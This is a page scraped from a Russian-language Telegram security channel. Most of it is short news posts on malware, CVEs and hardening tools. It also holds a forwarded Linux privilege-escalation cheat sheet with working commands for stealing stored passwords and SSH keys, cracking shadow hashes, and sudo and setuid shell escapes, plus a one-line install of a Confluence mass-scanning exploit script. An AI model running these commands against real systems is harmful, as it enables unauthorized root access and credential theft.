Похек
16.7K subscribers
2.23K photos
115 videos
243 files
3.16K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Monkey Hacker
#linux

Linux Privilege Escalation Cheat Sheet 🗞

🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍1
Похищаем сохраненный в Chrome пароль с помощью XSS 

В этой статье я расскажу о том, как с помощью XSS-атаки в сочетании с ClickJacking’ом злоумышленники могут похитить сохраненные в браузере пароли.
👍1😱1
Операторы LockBit используют Windows Defender для загрузки Cobalt Strike

Операторы вредоносной программы LockBit версии 3.0 используют командную строку антивирусной программы Windows Defender для загрузки «маячков» Cobalt Strike на скомпрометированные системы и обхода защитных средств.
3👍1
ВТБ: в июне акивность мошенников возросла в 10 раз

В минувшем месяце специалисты ВТБ выявили около 7 тыс. мошеннических страниц, имитирующих банковские сайты. Этот показатель почти в 10 раз выше майского и в 2,5 раза — суммарного за период с января по май.
👍1
Новый ботнет-рэпер для Linux брутфорсит SSH-серверы

Обнаруженный на днях ботнет “RapperBot” с середины июня 2022 года проводит брутфорс-атаки на SSH-серверы Linux. За основу авторы вредоноса взяли троян Mirai, изменив ряд его особенностей (например, бесконтрольное распространение на максимально доступное число устройств).
👍1
TOP All bugbounty pentesting CVE-2022- POC Exp Things

Table of Contents
- 2022 year top total 30
- 2021 year top total 30
- 2020 year top total 30
- 2019 year top total 30
- 2018 year top total 30
- 2017 year top total 30
- 2016 year top total 30
- 2015 year top total 30
- 2014 year top total 30
- 2013 year top total 30
Доброго времени суток, подписчики! Как вам новый формат постов?
👍5🔥1
Slither

Фреймворк статического анализа Solidity, написанный на Python 3. Он запускает набор детекторов уязвимостей, печатает визуальную информацию о деталях контрактов и предоставляет API для легкого написания пользовательских анализов. Slither позволяет разработчикам находить уязвимости, улучшать понимание кода и быстро создавать прототипы пользовательских анализов.
👍1
confluencePot

Это простой honeypot для уязвимости неаутентифицированной и удаленной инъекции OGNL в Atlassian Confluence (CVE-2022-26134).
👍1
Confusploit

Это скрипт python, который можно использовать с Shodan CLI для массового поиска серверов Confluence, уязвимых к CVE-2022-26134.
One-line установка: 
git clone https://github.com/p4b3l1t0/confusploit.git ; cd confusploit ; pip3 install -r requirements.txt ; chmod +x confusploit.py ; python3 confusploit.py
👍2
HardeningKitty and Windows 10 Hardening

Проект начинался как простой список мер по укреплению Windows 10. Через некоторое время был создан HardeningKitty, чтобы упростить укрепление Windows. Сейчас HardeningKitty поддерживает рекомендации Microsoft, CIS Benchmarks, DoD STIG и BSI SiSyPHuS Win10. И, конечно же, мой собственный список мер по укреплению.
👍1
Критическая RCE-уязвимость угрожает почти 30 моделям роутеров DrayTek

Сотни тысяч маршрутизаторов DrayTek Vigor в опасности из-за новой RCE-уязвимости, обнаруженной исследователями из компании Trellix. Баг затрагивает почти 30 моделей роутеров производителя, которые используются предприятиями малого и среднего бизнеса.
👍1
В VPN-роутерах Cisco исправлены критические уязвимости

Разработчики Cisco устранили критические уязвимости, затрагивающие VPN-маршрутизаторы для малого бизнеса и позволяющие удаленным неаутентифицированным злоумышленникам выполнять произвольный код или команды, а также провоцировать отказ в обслуживании на уязвимых устройствах.
Две наиболее опасные для роутеров проблемы, CVE-2022-20842 (9,8 балла по шкале CVSS) и CVE-2022-20827 (9 баллов по шкале CVSS), были обнаружены в веб-интерфейсе управления и функции обновления БД веб-фильтра, и обе связаны некорректной валидацией входных данных. Обе уязвимости можно использовать удаленно, они не требую аутентификации и взаимодействия с пользователем.
👍1
Хакеры используют сервис Dark Utilities для создания C&C-инфраструктуры

Аналитики Cisco Talos обнаружили новый сервис Dark Utilities, который предоставляет хакерам простой и недорогой способ создать управляющий центр для своих вредоносных операций.
👍1
Анализ данных об атаках и тенденций Log4J

Уязвимость Log4j, о которой первоначально сообщалось в ноябре 2021 года, затронула миллионы устройств и приложений по всему миру. Потенциально она может позволить злоумышленнику получить полный контроль над уязвимыми устройствами. Из-за того, что Log4j контролирует регистрацию строк и кода, уязвимость позволяет злоумышленникам внедрять вредоносный код в журналы и обманом заставлять приложения запускать этот вредоносный код.
👍1
Bypass open redirect protection
👍1👏1
Multiple vulnerabilities in Microsoft Windows

В Microsoft Windows обнаружены многочисленные уязвимости. Хакеры могут использовать эти уязвимости для получения привилегий, выполнения произвольного кода, обхода ограничений безопасности, получения конфиденциальной информации, отказа в обслуживании, подмены пользовательского интерфейса.
👍2
CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Компания Rapid7 обнаружила уязвимость локального повышения привилегий, затрагивающую межсетевые экраны Zyxel.

Уязвимая модель:
USG FLEX 100, 100W, 200, 500, 700
USG20-VPN, USG20W-VPN
ATP 100, 200, 500, 700, 800
VPN 50, 100, 300, 1000

Исправление CVE-2022-30525 и удаление веб интерфейса брандмауэра из интернета должно значительно снизить риск использования этой уязвимости.
👍1
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
LPE exploit for CVE-2022-34918
exploit kernel Linux ubuntu 5.15.0-39-generic

https://github.com/randorisec/CVE-2022-34918-LPE-PoC

Article
[CVE-2022-34918] A crack in the Linux firewall

https://www.randorisec.fr/crack-linux-firewall/
👍1
ZuoRAT Can Take Over Widely Used SOHO Routers

Новый многоступенчатый троян удаленного доступа (RAT), действующий с апреля 2020 года, использует известные уязвимости для нацеливания на популярные маршрутизаторы SOHO от Cisco Systems, Netgear, Asus и других компаний.
👍1